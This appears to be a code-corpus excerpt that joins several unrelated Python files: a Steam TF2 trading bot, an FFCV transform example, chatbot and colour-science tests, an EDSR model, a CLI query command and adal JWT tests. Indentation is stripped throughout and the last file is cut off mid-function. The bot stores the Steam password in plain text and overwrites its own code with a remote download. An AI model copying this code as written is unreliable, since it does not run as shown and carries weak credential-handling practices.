of misleading (see what I did there); it just counts how many scraps, recs, refs, keys and
buds there are.
Params: (self), typ (str)
Output: curr (list)
"""
if typ == 'sell':
return sort(self.items_to_receive)
else:
return sort(self.items_to_give)
def status(self):
"""
Fetches the status of the trade from steam. This way we can get live data.
Params: (self)
Output: trade_json['trade_offer_state'] (int/str)
"""
try:
trade_json = client.get_trade_offer(self.id)['response']['offer']
except KeyError:
#If key error, the trade doesn't exist anymore. If so, it's invalid
trade_json = {'trade_offer_state':1}
return trade_json['trade_offer_state']
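# Editorial sketch (assumption inferred from the keys accessed above, not an
# exact Steam Web API payload): the trade_json handed to Trade looks roughly like
#   {
#       "tradeofferid": "1234567890",
#       "accountid_other": 12345678,
#       "escrow_end_date": 0,
#       "trade_offer_state": 2,
#       "items_to_give": {"<assetid>": {"market_name": "Refined Metal"}},
#       "items_to_receive": {"<assetid>": {"market_name": "Mann Co. Supply Crate Key"}},
#   }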
def add_values(v1, v2):
v1_rem, v2_rem = int(str(v1).split('.')[1]), int(str(v2).split('.')[1])
ref = int(v1) + int(v2)
v1_rec, v2_rec = v1_rem // 33, v2_rem // 33
v1_rem, v2_rem = v1_rem - v1_rec * 33, v2_rem - v2_rec * 33
srp_added = v1_rem + v2_rem
v1_rec += srp_added // 33
srp_added -= (srp_added // 33) * 33
rec_added = v1_rec + v2_rec
ref += rec_added // 3
rec_added -= (rec_added // 3) * 3
return float(str(ref) + '.' + str(rec_added*33 + srp_added))
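# Worked examples (editorial addition) of the ref.remainder encoding used above,
# where the two digits after the decimal point are rec*33 + scrap*11:
#   add_values(1.33, 0.66) -> 2.0    (1 ref + 1 rec plus 2 rec = 2 ref)
#   add_values(0.22, 0.22) -> 0.44   (2 scrap + 2 scrap = 1 rec + 1 scrap)
#   add_values(1.44, 2.55) -> 4.0    (1 ref 1 rec 1 scrap + 2 ref 1 rec 2 scrap = 4 ref)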
def sort(items:list):
curr = [0,0,0,0,0]
for item in items:
if item == currencies['scrap']:
curr[0] += 1
elif item == currencies['rec']:
curr[1] += 1
elif item == currencies['ref']:
curr[2] += 1
elif item == currencies['key']:
curr[3] += 1
elif item == currencies['bud']:
curr[4] += 1
return curr
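# Example (editorial addition): sort() returns counts as [scrap, rec, ref, key, bud],
# e.g. sort(['Refined Metal', 'Scrap Metal', 'Scrap Metal']) == [2, 0, 1, 0, 0]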
def check_for_updates():
with open('__version__', 'r') as file:
curr_version = file.read()
r = requests.get('https://raw.githubusercontent.com/Zwork101/tf2-trade-bot/master/__version__')
new_version = r.text
if LooseVersion(new_version) > LooseVersion(curr_version):
print('[PROGRAM]: A new version is available, would you like to install?')
yn = input('[y/n]: ')
if yn[0].lower() == 'y':
print('[Installer]: Starting installation...', end='')
bot_update = requests.get('https://raw.githubusercontent.com/Zwork101/tf2-trade-bot/master/bot.py')
with open('__version__', 'w') as file:
file.write(new_version)
print('.', end='')
with open('bot.py', 'w') as file:
file.write(bot_update.text)
print('.')
print('Update complete! Restart now.')
input('press enter to close program...\n')
os._exit(0)
def calculate(scrapC, recC, refC, keyC, budC):
#For each currency, add it using add_values function
total_value = 0.0
for scrap in range(scrapC):
total_value = add_values(total_value, .11)
for rec in range(recC):
total_value = add_values(total_value, .33)
for ref in range(refC):
total_value = add_values(total_value, 1.0)
for key in range(keyC):
total_value = add_values(total_value, float(key_price))
for bud in range(budC):
total_value = add_values(total_value, float(bud_price))
return total_value
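# Example (editorial addition), using only metal so the result does not depend on
# the key_price/bud_price globals fetched at runtime:
#   calculate(1, 1, 1, 0, 0) -> 1.44   (1 scrap + 1 rec + 1 ref)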
def check_install(pkg, c, imp=''):
try:
importlib.import_module(pkg)
print(f'[PROGRAM]: Required package is installed {c}/{len(packages)}')
logging.debug(f"MODULE {pkg} IS INSTALLED")
except:
logging.info(f"MODULE {pkg} IS NOT INSTALLED")
if imp:
pkg = imp
print('[PROGRAM]: A required package is not installed, installing...')
main(['install', pkg])
print('[PROGRAM]: Installed package! Please restart this program to continue.')
input('press enter to close program...\n')
os._exit(0)
# def check_trade(trade_obj, items_value, typ):
# curr = trade_obj.sort(typ)
# value = calculate(curr[0], curr[1], curr[2], curr[3], curr[4])
# if typ == 'sell':
# b_curr = trade_obj.sort('buy')
# items_value += calculate(b_curr[0], b_curr[1], b_curr[2], b_curr[3], b_curr[4])
# else:
# s_curr = trade_obj.sort('sell')
# items_value += calculate(s_curr[0], s_curr[1], s_curr[2], s_curr[3], s_curr[4])
#
# logging.debug(f"TRADE {trade_obj.id} is a {typ} trade, and is worth {value}, with items being {items_value}")
# if typ == 'sell':
# if value >= items_value:
# return True
# else:
# return False
# else:
# if value <= items_value:
# return True
# else:
# return False
def heartbeat():
global past_time
print(f"[HEARTBEAT]: ~{90 - int(time.time() - past_time)} seconds until next heartbeat")
if int(time.time() - past_time) >= 90:
p = requests.post(f"https://backpack.tf/api/aux/heartbeat/v1?", data={"token": token, "automatic": "all"})
if p.status_code != 200:
print(f'[HEARTBEAT]: Error when sending heartbeat: {p.json()["message"]}')
logging.warning(f"ERROR SENDING HEARTBEAT: {p.json()['message']}")
else:
print("[HEARTBEAT]: Sent heartbeat to backpack.tf")
logging.info("HEARTBEAT SENT")
past_time = time.time()
if __name__ == '__main__':
print(start_text)
for pkg in packages:
check_install(pkg, packages.index(pkg)+1, '' if pkg!='backpackpy' else 'backpack.py')
from steampy.client import SteamClient
from steampy import confirmation
from steampy.exceptions import InvalidCredentials, ConfirmationExpected
#from backpackpy import listings
import requests
check_for_updates()
try:
with open('settings.json', 'r') as cfg:
try:
data = json.load(cfg)
try:
apikey, password, username, bkey, accept_escrow = data['apikey'],\
data['password'], data['username'], data['bkey'], data['accept_escrow']
token = requests.get(f"https://backpack.tf/api/aux/token/v1?key={bkey}").json()['token']
decline_trades = data.get('decline_trades', 1)
confirm_settings = data.get('confirm_options', 'trades')
except KeyError as k:
logging.warning(f'SETTINGS FILE MISSING {k} VALUE')
print(f'[settings.json]: Whoops! You are missing the {k} value')
input('Press enter to close program...\n')
os._exit(1)
except json.JSONDecodeError:
logging.warning('INVALID SETTINGS FILE')
print('[PROGRAM]: Whoops! It would seem that your settings.json file is invalid!')
input('press enter to close program...\n')
os._exit(1)
logging.debug("LOADED SETTINGS")
except FileNotFoundError:
logging.warning("SETTINGS NOT FOUND, CREATING")
print('[PROGRAM]: File settings.json not found! Would you like to make one?')
yn = input('[y/n]: ')
if yn[0].lower() == 'y':
apikey = input('[settings.json]: Enter your steam API key. (https://steamcommunity.com/dev/apikey)\n')
password = input('[settings.json]: Enter your password. \n')
username = input('[settings.json]: Enter your username. \n')
bkey = input('[settings.json]: Enter your backpack.tf API key. (https://backpack.tf/api/register)\n')
accept_escrow = input('[settings.json]: Accept escrow trades? (0 for no, 1 for yes)\n')
print('[PROGRAM]: Writing data to file...')
with open('settings.json', 'w') as file:
json.dump({'apikey':apikey, 'password':password, 'username':username, 'bkey':bkey,
"accept_escrow":accept_escrow}, file)
print('[PROGRAM]: Wrote to file')
else:
print("[PROGRAM]: Can't run without user information.")
input('Press enter to close program...\n')
os._exit(1)
client = SteamClient(apikey)
conf = None
print('[PROGRAM]: Obtaining bud and key values from backpack.tf...')
rJson = requests.get(f'https://backpack.tf/api/IGetCurrencies/v1?key={bkey}').json()['response']
logging.debug(f"KEY VALUE RESPONSE: {rJson}")
if rJson['success']:
key_price = rJson['currencies']['keys']['price']['value']
bud_price = rJson['currencies']['earbuds']['price']['value']
print(f'[PROGRAM]: Obtained values! KEY <{key_price} ref>, BUD <{bud_price} keys>.')
logging.debug("OBTAINED KEY AND BUD VALUES")
else:
logging.fatal("FAILED TO OBTAIN KEY AND BUG VALUES")
print(f'[backpack.tf]: {rJson["message"]}')
input('Press enter to close program...\n')
os._exit(1)
try:
client.login(username, password, '<PASSWORD>')
except json.decoder.JSONDecodeError:
logging.warning("STEAMGUARD FILE INVALID")
print('[steamguard.json]: Unable to read file.')
input('Press enter to close program...\n')
os._exit(1)
except FileNotFoundError:
logging.warning("UNABLE TO FIND STEAMGAURD FILE")
print('[steamguard.json]: Unable to find file.')
input('Press enter to close program...\n')
os._exit(1)
except InvalidCredentials:
logging.info("CREDENTIALS INVALID")
print('[PROGRAM]: Your username, password, ID and/or secrets are invalid.')
input('Press enter to close program...\n')
os._exit(1)
else:
conf = confirmation.ConfirmationExecutor(
client.steam_guard['identity_secret'],
client.steam_guard['steamid'],
client._session)
logging.info("CREATED CLIENT AND CONFIRMATION MANAGER")
print(f'[PROGRAM]: Connected to steam! Logged in as {username}')
try:
with open('trade.csv', 'r') as file:
reader = csv.DictReader(file)
count = 1
fails = []
for row in reader:
count += 1
try:
if row['type'].strip()[0].lower() == 's':
p = row['price'].split('.')
p = [int(i) for i in p]
price = calculate(p[0], p[1], p[2], p[3], p[4])
sell_trades[row['item_name'].strip().replace("$$", ",")] = price
elif row['type'].strip()[0].lower() == 'b':
p = row['price'].split('.')
p = [int(i) for i in p]
price = calculate(p[0], p[1], p[2], p[3], p[4])
buy_trades[row['item_name'].strip().replace("$$", ",")] = price
except AttributeError:
fails.append(count)
logging.info(f'LOADED TRADE DATA: BUY: {buy_trades} SELL: {sell_trades}')
except FileNotFoundError:
logging.warning("TRADE FILE NOT FOUND")
print('[trade.data]: Unable to find file.')
input('Press enter to close program...\n')
os._exit(1)
print(f'[CSV]: Failed to load these lines: {fails}')
print('[PROGRAM]: Finished loading trading data.')
# yn = input("Would you like to sync to backpack.tf listings?\n[y/n]: ")
# if yn[0].lower() == 'y':
# steamid = client.steam_guard['steamid']
# steam_inv = requests.get(f'http://steamcommunity.com/inventory/{steamid}/440/2?l=english&count=5000').json()
# bp_listings = requests.get("https://backpack.tf/api/classifieds/listings/v1?", data={'token':token}).json()
# class_id = False
# for classified in bp_listings["listings"]:
# asset_id = classified['id']
# for item in steam_inv['assets']:
# if item['assetid'] == classified['id']:
# class_id = item['classid']
# if class_id:
# for item in steam_inv['descriptions']:
# if item['classid'] == class_id:
# market_name = item['market_name']
# market_type = classified['intent']
# ref, keys = classified['currencies']['metal'], classified['currencies']['keys']
# sep = str(ref).split('.')
# if len(sep) == 2:
# price = calculate(int(sep[0])/11, 0, int(sep[0]), keys, 0)
# else:
# price = calculate(0, 0, int(ref), keys, 0)
# if market_type:
# sell_trades[market_name] = price
# else:
# buy_trades[market_name] = price
# print(buy_trades)
# print(sell_trades)
# os._exit(0)
try:
with open('whitelist.data', 'r') as file:
steam_ids = file.read()
if steam_ids:
for steam_id in steam_ids.split(','):
whitelist.append(steam_id)
print(f'[WHITELIST]: Whitelist created with the following ids: {whitelist}')
logging.info(f"LOADED WHITELIST: {whitelist}")
except FileNotFoundError:
logging.debug("WHITELIST NOT FOUND")
print('[PROGRAM]: Everything ready, starting trading.')
print('[PROGRAM]: Press Ctrl+C to close at any time.')
manager = TradeManager(client, conf)
while True:
if time.time() - start_time >= 3600:
pass
#subprocess.call(["python", os.path.join(sys.path[0], __file__)] + sys.argv[1:])
try:
heartbeat()
try:
manager.get_new_trades()
print('[TRADE-MANAGER] STEP 1 (get new trades) COMPLETE')
logging.debug("(STEP 1 COMPLETE)")
except json.decoder.JSONDecodeError:
print("[PROGRAM]: Unexpected error, taking a break (10 seconds).")
time.sleep(10)
print('Starting again...')
continue
manager.check_trades_content()
print('[TRADE-MANAGER]: STEP 2 (check new trades) COMPLETE')
logging.debug("(STEP 2 COMPLETE)")
manager.check_bad_trades()
print('[TRADE-MANAGER]: STEP 3 (check for trades gone bad) COMPLETE')
logging.debug("(STEP 3 COMPLETE)")
manager.check_good_trades()
print('[TRADE-MANAGER]: STEP 4 (check for successful trades) COMPLETE')
logging.debug("(STEP 4 COMPLETE)")
manager.confirm_check()
print('[TRADE-MANAGER]: STEP 5 (check confirmations) COMPLETE')
logging.debug("(STEP 5 COMPLETE)")
print('[PROGRAM]: Cooling down... (10)')
except InterruptedError:
os._exit(0)
except BaseException as BE:
print(f'[ERROR]: {type(BE).__name__}: {BE}')
logging.warning(f"UNEXPECTED ERROR: {type(BE).__name__}: {BE}")
time.sleep(10)
|
examples/docs_examples/custom_transform.py | neuroailab/ffcv | 1,969 | 84410 |
"""
Example of defining a custom (image) transform using FFCV.
For tutorial, see https://docs.ffcv.io/ffcv_examples/custom_transforms.html.
"""
import time
import numpy as np
import torchvision
from ffcv.fields import IntField, RGBImageField
from ffcv.fields.decoders import SimpleRGBImageDecoder
from ffcv.loader import Loader, OrderOption
from ffcv.pipeline.compiler import Compiler
from ffcv.pipeline.operation import Operation, AllocationQuery
from ffcv.transforms import ToTensor
from ffcv.writer import DatasetWriter
from dataclasses import replace
class PickACorner(Operation):
def generate_code(self):
parallel_range = Compiler.get_iterator()
def pick_a_corner(images, dst):
which_corner = np.random.rand(images.shape[0])
for i in parallel_range(images.shape[0]):
if which_corner[i] < 0.5:
dst[i] = images[i,:images.shape[1]//2, :images.shape[2]//2]
else:
dst[i] = images[i,-images.shape[1]//2:, -images.shape[2]//2:]
return dst
pick_a_corner.is_parallel = True
return pick_a_corner
def declare_state_and_memory(self, previous_state):
h, w, c = previous_state.shape
new_shape = (h // 2, w // 2, c)
new_state = replace(previous_state, shape=new_shape)
mem_allocation = AllocationQuery(new_shape, previous_state.dtype)
return (new_state, mem_allocation)
# Step 1: Create an FFCV-compatible CIFAR-10 dataset
ds = torchvision.datasets.CIFAR10('/tmp', train=True, download=True)
writer = DatasetWriter('/tmp/cifar.beton', {
'image': RGBImageField(),
'label': IntField()
})
writer.from_indexed_dataset(ds)
# Step 2: Create data loaders
BATCH_SIZE = 512
# Create loaders
image_pipelines = {
'with': [SimpleRGBImageDecoder(), PickACorner(), ToTensor()],
'without': [SimpleRGBImageDecoder(), ToTensor()]
}
for name, pipeline in image_pipelines.items():
loader = Loader(f'/tmp/cifar.beton', batch_size=BATCH_SIZE,
num_workers=16, order=OrderOption.RANDOM,
drop_last=True, pipelines={'image': pipeline})
# First epoch includes compilation time
for ims, labs in loader: pass
start_time = time.time()
for _ in range(100):
for ims, labs in loader: pass
print(f'Method: {name} | Shape: {ims.shape} | Time per epoch: {(time.time() - start_time) / 100:.5f}s')
|
test/programytest/clients/events/test_client.py | cdoebler1/AIML2 | 345 | 84420 |
import unittest.mock
from programy.clients.config import ClientConfigurationData
from programy.clients.events.client import EventBotClient
from programytest.clients.arguments import MockArgumentParser
class MockEventBotClient(EventBotClient):
def __init__(self, id, argument_parser=None):
EventBotClient.__init__(self, id, argument_parser)
def get_client_configuration(self):
return ClientConfigurationData("events")
def load_license_keys(self):
pass
class MockRunningEventBotClient(EventBotClient):
def __init__(self, id, argument_parser=None):
EventBotClient.__init__(self, id, argument_parser)
self.prior = False
self.ran = False
self.post = False
def get_client_configuration(self):
return ClientConfigurationData("events")
def load_license_keys(self):
pass
def prior_to_run_loop(self):
self.prior = True
def wait_and_answer(self):
self.ran = True
def post_run_loop(self):
self.post = True
class EventBotClientTests(unittest.TestCase):
def test_init_raw(self):
arguments = MockArgumentParser()
with self.assertRaises(NotImplementedError):
client = EventBotClient("testevents", arguments)
def test_init_actual(self):
arguments = MockArgumentParser()
client = MockEventBotClient("testevents", arguments)
self.assertIsNotNone(client)
with self.assertRaises(NotImplementedError):
client.wait_and_answer()
def test_init_running(self):
arguments = MockArgumentParser()
client = MockRunningEventBotClient("testevents", arguments)
self.assertIsNotNone(client)
client.run()
self.assertTrue(client.prior)
self.assertTrue(client.ran)
self.assertTrue(client.post)
|
basicsr/archs/edsr_arch.py | Cospel/BasicSR | 3,168 | 84422 |
import torch
from torch import nn as nn
from basicsr.archs.arch_util import ResidualBlockNoBN, Upsample, make_layer
from basicsr.utils.registry import ARCH_REGISTRY
@ARCH_REGISTRY.register()
class EDSR(nn.Module):
"""EDSR network structure.
Paper: Enhanced Deep Residual Networks for Single Image Super-Resolution.
Ref git repo: https://github.com/thstkdgus35/EDSR-PyTorch
Args:
num_in_ch (int): Channel number of inputs.
num_out_ch (int): Channel number of outputs.
num_feat (int): Channel number of intermediate features.
Default: 64.
num_block (int): Block number in the trunk network. Default: 16.
upscale (int): Upsampling factor. Support 2^n and 3.
Default: 4.
res_scale (float): Used to scale the residual in residual block.
Default: 1.
img_range (float): Image range. Default: 255.
rgb_mean (tuple[float]): Image mean in RGB orders.
Default: (0.4488, 0.4371, 0.4040), calculated from DIV2K dataset.
"""
def __init__(self,
num_in_ch,
num_out_ch,
num_feat=64,
num_block=16,
upscale=4,
res_scale=1,
img_range=255.,
rgb_mean=(0.4488, 0.4371, 0.4040)):
super(EDSR, self).__init__()
self.img_range = img_range
self.mean = torch.Tensor(rgb_mean).view(1, 3, 1, 1)
self.conv_first = nn.Conv2d(num_in_ch, num_feat, 3, 1, 1)
self.body = make_layer(ResidualBlockNoBN, num_block, num_feat=num_feat, res_scale=res_scale, pytorch_init=True)
self.conv_after_body = nn.Conv2d(num_feat, num_feat, 3, 1, 1)
self.upsample = Upsample(upscale, num_feat)
self.conv_last = nn.Conv2d(num_feat, num_out_ch, 3, 1, 1)
def forward(self, x):
self.mean = self.mean.type_as(x)
x = (x - self.mean) * self.img_range
x = self.conv_first(x)
res = self.conv_after_body(self.body(x))
res += x
x = self.conv_last(self.upsample(res))
x = x / self.img_range + self.mean
return x
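# ---------------------------------------------------------------------------
# Hedged usage sketch (editorial addition, not part of the original file):
# instantiating the architecture directly, assuming basicsr is installed and
# the default 4x upscale. Shapes shown are expectations, not measured output.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    model = EDSR(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=16, upscale=4)
    dummy = torch.rand(1, 3, 32, 32)
    with torch.no_grad():
        out = model(dummy)
    print(out.shape)  # expected: torch.Size([1, 3, 128, 128])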
|
tests/packagedcode/data/pypi/setup.py/arpy_setup.py | s4-2/scancode-toolkit | 1,511 | 84432 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from distutils.core import setup
setup(name='arpy',
version='0.1.1',
description='Library for accessing "ar" files',
author=u'<NAME>',
author_email='<EMAIL>',
url='http://bitbucket.org/viraptor/arpy',
py_modules=['arpy'],
license="Simplified BSD",
)
|
googleanalytics/commands/query.py | ruber0id/google-analytics | 170 | 84439 |
# encoding: utf-8
import json
import yaml
import click
import googleanalytics as ga
from googleanalytics import utils
from .common import cli
# TODO: the blueprint stuff can probably be simplified so that
# it's little more than just a call to ga.describe
def from_blueprint(scope, src):
description = yaml.safe_load(src)
blueprint = ga.Blueprint(description)
credentials = {}
credentials.update(blueprint.identity or {})
credentials.update(blueprint.scope)
profile = ga.authenticate(interactive=True, save=True, **credentials)
return blueprint.queries(profile)
# TODO: add any query generation improvements not associated with
# string parsing back into blueprint generation and query.refine
# so they apply across the board
def from_args(scope, metrics,
start, stop, days, limit,
dimensions, filter, segment,
**description):
# LIMIT can be a plain limit or start and length
if limit:
limit = list(map(int, limit.split(',')))
description.update({
'range': {
'start': start,
'stop': stop,
'days': days,
},
'metrics': utils.cut(metrics, ','),
'limit': limit,
})
if dimensions:
description['dimensions'] = utils.cut(dimensions, ',')
query = ga.query.describe(scope, description)
for f in filter:
query = ga.query.refine(query, {'filter': dict(utils.cut(f, '=', ','))})
for s in segment:
query = ga.query.refine(query, {'segment': dict(utils.cut(s, '=', ','))})
return [query]
# TODO: maybe include an --interactive option, which defers
# to `shell` but with a prefilled query?
@cli.command()
@click.argument('metrics')
@click.option('--dimensions')
@click.option('--start',
help='Start date in ISO format, e.g. 2016-01-01.')
@click.option('--stop')
@click.option('--days',
help='Days to count forward from start date, counts backwards when negative.',
default=0,
type=int)
@click.option('--limit',
help='Return only the first <n> or <start>,<n> results.')
@click.option('--sort',
help='Sort by a metric; prefix with - to sort from high to low.')
@click.option('--debug',
is_flag=True)
@click.option('--filter',
multiple=True)
@click.option('--segment',
multiple=True)
@click.option('--precision',
type=click.IntRange(0, 2),
default=1,
help='Increase or decrease query precision.')
@click.option('-i', '--interval',
type=click.Choice(['hour', 'day', 'week', 'month', 'year', 'total']),
default='total',
help='Return hourly, daily etc. numbers.')
@click.option('-o', '--output',
type=click.Choice(['csv', 'json', 'ascii']),
default='ascii',
help='Output format; human-readable ascii table by default.')
@click.option('--with-metadata',
is_flag=True)
@click.option('-b', '--blueprint',
type=click.File('r'))
@click.option('--realtime',
is_flag=True,
help='Use the RealTime API instead of the Core API.')
@click.pass_obj
def query(scope, blueprint, debug, output, with_metadata, realtime, **description):
"""
e.g.
googleanalytics --identity debrouwere --account debrouwere --webproperty http://debrouwere.org \
query pageviews \
--start yesterday --limit -10 --sort -pageviews \
--dimensions pagepath \
--debug
"""
if realtime:
description['type'] = 'realtime'
if blueprint:
queries = from_blueprint(scope, blueprint)
else:
if not isinstance(scope, ga.account.Profile):
raise ValueError("Account and webproperty needed for query.")
queries = from_args(scope, **description)
for query in queries:
if debug:
click.echo(query.build())
report = query.serialize(format=output, with_metadata=with_metadata)
click.echo(report)
|
colour/appearance/tests/test_hunt.py | colour-science/colour | 1,380 | 84490 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Defines the unit tests for the :mod:`colour.appearance.hunt` module.
"""
import numpy as np
from itertools import permutations
from colour.appearance import (VIEWING_CONDITIONS_HUNT, InductionFactors_Hunt,
XYZ_to_Hunt)
from colour.appearance.tests.common import AbstractColourAppearanceModelTest
from colour.utilities import (as_float_array, domain_range_scale,
ignore_numpy_errors, tstack)
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = ['TestHuntColourAppearanceModel']
class TestHuntColourAppearanceModel(AbstractColourAppearanceModelTest):
"""
Defines :mod:`colour.appearance.hunt` module unit tests methods for
*Hunt* colour appearance model.
"""
FIXTURE_BASENAME = 'hunt.csv'
OUTPUT_ATTRIBUTES = {
'J': 'J',
'C_94': 'C',
'h_S': 'h',
's': 's',
'Q': 'Q',
'M94': 'M'
}
def output_specification_from_data(self, data):
"""
Returns the *Hunt* colour appearance model output specification from
given data.
Parameters
----------
data : list
Fixture data.
Returns
-------
CAM_Specification_Hunt
Hunt colour appearance model specification.
"""
XYZ = tstack([data['X'], data['Y'], data['Z']])
XYZ_w = tstack([data['X_w'], data['Y_w'], data['Z_w']])
XYZ_b = tstack([data['X_w'], 0.2 * data['Y_w'], data['Z_w']])
specification = XYZ_to_Hunt(
XYZ,
XYZ_w,
XYZ_b,
data['L_A'],
InductionFactors_Hunt(data['N_c'], data['N_b']),
CCT_w=data['T'])
return specification
def test_domain_range_scale_XYZ_to_Hunt(self):
"""
Tests :func:`colour.appearance.hunt.XYZ_to_Hunt` definition domain
and range scale support.
"""
XYZ = np.array([19.01, 20.00, 21.78])
XYZ_w = np.array([95.05, 100.00, 108.88])
XYZ_b = np.array([95.05, 100.00, 108.88])
L_A = 318.31
surround = VIEWING_CONDITIONS_HUNT['Normal Scenes']
CCT_w = 6504.0
specification = XYZ_to_Hunt(
XYZ, XYZ_w, XYZ_b, L_A, surround, CCT_w=CCT_w)
d_r = (
('reference', 1, 1),
(1, 0.01, np.array([1, 1, 1 / 360, 1, 1, 1, np.nan, np.nan])),
(100, 1, np.array([1, 1, 100 / 360, 1, 1, 1, np.nan, np.nan])),
)
for scale, factor_a, factor_b in d_r:
with domain_range_scale(scale):
np.testing.assert_almost_equal(
XYZ_to_Hunt(
XYZ * factor_a,
XYZ_w * factor_a,
XYZ_b * factor_a,
L_A,
surround,
CCT_w=CCT_w),
as_float_array(specification) * factor_b,
decimal=7)
@ignore_numpy_errors
def test_raise_exception_CIECAM02_to_XYZ(self):
"""
Tests :func:`colour.appearance.hunt.XYZ_to_Hunt` definition raised
exception.
"""
XYZ = np.array([19.01, 20.00, 21.78])
XYZ_w = np.array([95.05, 100.00, 108.88])
XYZ_b = np.array([95.05, 100.00, 108.88])
L_A = 318.31
surround = VIEWING_CONDITIONS_HUNT['Normal Scenes']
CCT_w = 6504.0
S = S_w = 0.5
self.assertRaises(ValueError, XYZ_to_Hunt, XYZ, XYZ_w, XYZ_b, L_A, surround)
self.assertRaises(ValueError, XYZ_to_Hunt, XYZ, XYZ_w, XYZ_b, L_A, surround, CCT_w=CCT_w, S=S)
self.assertRaises(ValueError, XYZ_to_Hunt, XYZ, XYZ_w, XYZ_b, L_A, surround, CCT_w=CCT_w, S_w=S_w)
@ignore_numpy_errors
def test_XYZ_p_CIECAM02_to_XYZ(self):
"""
Tests :func:`colour.appearance.hunt.XYZ_to_Hunt` definition *XYZ_p*
argument handling.
"""
XYZ = np.array([19.01, 20.00, 21.78])
XYZ_w = np.array([95.05, 100.00, 108.88])
XYZ_b = XYZ_p = np.array([95.05, 100.00, 108.88])
L_A = 318.31
surround = VIEWING_CONDITIONS_HUNT['Normal Scenes']
CCT_w = 6504.0
np.testing.assert_almost_equal(
XYZ_to_Hunt(
XYZ,
XYZ_w,
XYZ_b,
L_A,
surround,
XYZ_p=XYZ_p,
CCT_w=CCT_w,
),
np.array([
30.046267861960700, 0.121050839936350, 269.273759446144600,
0.019909320692942, 22.209765491265024, 0.123896438259997,
np.nan, np.nan
]),
decimal=7)
@ignore_numpy_errors
def test_nan_XYZ_to_Hunt(self):
"""
Tests :func:`colour.appearance.hunt.XYZ_to_Hunt` definition
nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = set(permutations(cases * 3, r=3))
for case in cases:
XYZ = np.array(case)
XYZ_w = np.array(case)
XYZ_b = np.array(case)
L_A = case[0]
surround = InductionFactors_Hunt(case[0], case[0])
CCT_w = case[0]
XYZ_to_Hunt(XYZ, XYZ_w, XYZ_b, L_A, surround, CCT_w=CCT_w)
|
tests/test_self_signed_jwt.py | Yoni-Mantzur/azure-activedirectory-library-for-python | 258 | 84493 |
#------------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation.
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#------------------------------------------------------------------------------
import sys
import requests
import httpretty
import json
from datetime import datetime
try:
import unittest2 as unittest
except ImportError:
import unittest
try:
from unittest import mock
except ImportError:
import mock
import adal
from adal.authority import Authority
from adal import self_signed_jwt
from adal.self_signed_jwt import SelfSignedJwt
from adal.authentication_context import AuthenticationContext
from tests import util
from tests.util import parameters as cp
class TestSelfSignedJwt(unittest.TestCase):
testNowDate = cp['nowDate']
testJwtId = cp['jwtId']
expectedJwtWithThumbprint = cp['expectedJwtWithThumbprint']
expectedJwtWithPublicCert = cp['expectedJwtWithPublicCert']
unexpectedJwt = 'unexpectedJwt'
testAuthority = Authority('https://login.microsoftonline.com/naturalcauses.com', False)
testClientId = 'd6835713-b745-48d1-bb62-7a8248477d35'
testCert = cp['cert']
testPublicCert=cp['publicCert']
def _create_jwt(self, cert, thumbprint, public_certificate = None, encodeError = None):
ssjwt = SelfSignedJwt(cp['callContext'], self.testAuthority, self.testClientId)
self_signed_jwt._get_date_now = mock.MagicMock(return_value = self.testNowDate)
self_signed_jwt._get_new_jwt_id = mock.MagicMock(return_value = self.testJwtId)
if encodeError:
self_signed_jwt._encode_jwt = mock.MagicMock(return_value = self.unexpectedJwt)
else:
expected = self.expectedJwtWithPublicCert if public_certificate else self.expectedJwtWithThumbprint
self_signed_jwt._encode_jwt = mock.MagicMock(return_value = expected)
jwt = ssjwt.create(cert, thumbprint, public_certificate=public_certificate)
return jwt
def _create_jwt_and_match_expected_err(self, testCert, thumbprint, encodeError = None):
with self.assertRaises(Exception):
self._create_jwt(testCert, thumbprint, encodeError = encodeError)
def _create_jwt_and_match_expected_jwt(self, cert, thumbprint):
jwt = self._create_jwt(cert, thumbprint)
self.assertTrue(jwt, 'No JWT generated')
self.assertTrue(jwt == self.expectedJwtWithThumbprint, 'Generated JWT does not match expected:{}'.format(jwt))
def test_jwt_hash_with_public_cert(self):
jwt = self._create_jwt(self.testCert, cp['certHash'], public_certificate = self.testPublicCert)
self.assertTrue(jwt == self.expectedJwtWithPublicCert, 'Generated JWT does not match expected:{}'.format(jwt))
def test_create_jwt_hash_colons(self):
self._create_jwt_and_match_expected_jwt(self.testCert, cp['certHash'])
def test_create_jwt_hash_spaces(self):
thumbprint = cp['certHash'].replace(':', ' ')
self._create_jwt_and_match_expected_jwt(self.testCert, thumbprint)
def test_create_jwt_hash_straight_hex(self):
thumbprint = cp['certHash'].replace(':', '')
self._create_jwt_and_match_expected_jwt(self.testCert, thumbprint)
def test_create_jwt_invalid_cert(self):
self._create_jwt_and_match_expected_err('foobar', cp['certHash'], encodeError = True)
def test_create_jwt_invalid_thumbprint_1(self):
self._create_jwt_and_match_expected_err(self.testCert, 'zzzz')
def test_create_jwt_invalid_thumbprint_wrong_size(self):
